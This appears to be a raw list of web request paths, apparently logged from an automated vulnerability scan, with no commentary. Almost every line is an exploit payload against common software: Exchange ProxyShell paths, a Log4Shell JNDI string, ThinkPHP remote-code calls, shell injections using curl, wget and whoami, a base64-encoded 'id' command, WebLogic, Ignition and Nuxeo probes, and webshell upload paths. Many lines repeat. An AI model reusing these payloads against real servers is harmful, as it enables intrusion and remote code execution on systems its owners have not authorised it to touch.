/web/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
/web/ws_utc/resources/setting/options
/web/actions/authenticate.php
/web/admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=24s8kCXdlJW0PUyLPYJMlIpXTma.php&target=l1_Lw
/web/lui/
/web/console/images/%252e%252e%252fconsole.portal
/web/reports/rwservlet/showenv
/web/EemAdminService/EemAdmin
/web/wp-admin/admin-ajax.php
/web/ajax/render/widget_tabbedcontainer_tab_panel
/web/install/install.php?step=4
/web/_fragment?_path=_controller=phpcredits&flag=-1
/web/jars/upload
/web/ws_utc/resources/setting/keystore
/web/_ignition/execute-solution
/web/version.web
/web/hub/
/web/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
/web/login/
/web/EemAdminService/EemAdmin
/web/ajax/render/widget_tabbedcontainer_tab_panel
/web/wp-admin/admin-ajax.php
/web/_fragment?_path=_controller=phpcredits&flag=-1
/web/install/install.php?step=4
/web/include/nuclei.txt
/web/manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064
/web/qvisdvr/
/web/?id=nuclei%25{128*128}
/web/jolokia/read/getDiagnosticOptions
/web/_ignition/execute-solution
/web/cf_scripts/scripts/ajax/package/cfajax.js
/web/wp-content/uploads/workreap-temp/24s8kFd4C6FbHAdU1XDC6prDiUg.php
/web/mailingupgrade.php
/web/install/includes/configure.php
/web
/web/cf-scripts/scripts/ajax/package/cfajax.js
/web/webadm/?q=moni_detail.do&action=gragh
/web/_ignition/execute-solution
/web/manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064
/web/?author=1
/web
/web/clients/editclient.php?id=24s8kEyAZuKiDlcvS30yMhqBAtD&action=update
/web/(download)/tmp/poc.txt
/web/SDK/webLanguage
/web/CFIDE/scripts/ajax/package/cfajax.js
/web/poc.jsp/
/web/_ignition/execute-solution
/web/webadmin/out
/web/_async/AsyncResponseService
/web/logos_clients/1.php
/web/x
/web/ajax/render/widget_tabbedcontainer_tab_panel
/web/cfide/scripts/ajax/package/cfajax.js
/web/_ignition/execute-solution
/web/CF_SFSD/scripts/ajax/package/cfajax.js
/web/_ignition/execute-solution
/web/nuxeo/login.jsp/pwn$%7B31333333330+7%7D.xhtml
/web/lib/crud/userprocess.php
/web/cfide-scripts/ajax/package/cfajax.js
/web/solr/admin/cores?wt=json
/web/
/web/objects/getImage.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=png
/web/cfmx/CFIDE/scripts/ajax/package/cfajax.js
/web/webtools/control/SOAPService
/web/_search?pretty
/web/objects/getImageMP4.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg
/web/invoker/JMXInvokerServlet/
/web/index.php
/web/objects/getSpiritsFromVideo.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg
/web/invoker/EJBInvokerServlet/
/web/login
/web/objects/nuclei.txt
/web/user.action
/web/lcms/index.php
/web/mgmt/shared/authn/login
/web/solr/admin/cores?wt=json
/web/cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C
/web/system/sharedir.php
/web/wls-wsat/RegistrationRequesterPortType
/web/php/ping.php
/web/v2/query
/web/boafrm/formSysCmd
/web/login.htm
/web/upload
/web/wls-wsat/CoordinatorPortType
/web/boardDataWW.php
/web/
/web/RPC2
/web/websso/SAML2/SSO/vsphere.local?SAMLRequest=
/web/boaform/admin/formTracert
/web/
/web/sitecore/shell/ClientBin/Reporting/Report.ashx
/web/assets/php/upload.php
/web/graph_realtime.php?action=init
/web/?x=${jndi:ldap://${hostName}./a}
/web/
/web/
/web?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
/web/en/php/usb_sync.php
/web/ajax/networking/get_netcfg.php?iface=;curl%20http:///`whoami`;
/web/search.php?searchtype=5
/web/ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData
/web/website/blog/
/web/
/web/
/web/websso/SAML2/SSO/vsphere.local?SAMLRequest=
/web/RPC2
/web/boaform/admin/formTracert
/web/
/web/sitecore/shell/ClientBin/Reporting/Report.ashx
/web/assets/php/upload.php
/web/graph_realtime.php?action=init
/web/?x=${jndi:ldap://${hostName}./a}
/web/
/web/
/web/en/php/usb_sync.php
/web/ajax/networking/get_netcfg.php?iface=;curl%20http:///`whoami`;
/web/search.php?searchtype=5
/web/website/blog/
/web/ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData
/web/
/web/
/web/index.php
/web/?s=index/index/index
/web/index.php?plot=;wget%20http:/
/web/assets/data/usrimg/24s8kfvst9hzpb5tfyzimie9rss.php
/web/cgi-bin/status
/web/cgi-bin/jarrewrite.sh
/web/run
/web/users/sign_in
/web/owa/auth/x.js
/web/search.php?search=%22;wget+http%3A%2F%2F%27;%22
/web/s=set&_method=__construct&method=*&filter[]=system
/web/_search
/web/index.php
/web/index.php?plot=;wget%20http:/
/web/?s=index/index/index
/web/assets/data/usrimg/24s8kfvst9hzpb5tfyzimie9rss.php
/web/cgi-bin/status
/web/cgi-bin/jarrewrite.sh
/web/run
/web/users/sign_in
/web/owa/auth/x.js
/web/search.php?search=%22;wget+http%3A%2F%2F%27;%22
/web/s=set&_method=__construct&method=*&filter[]=system
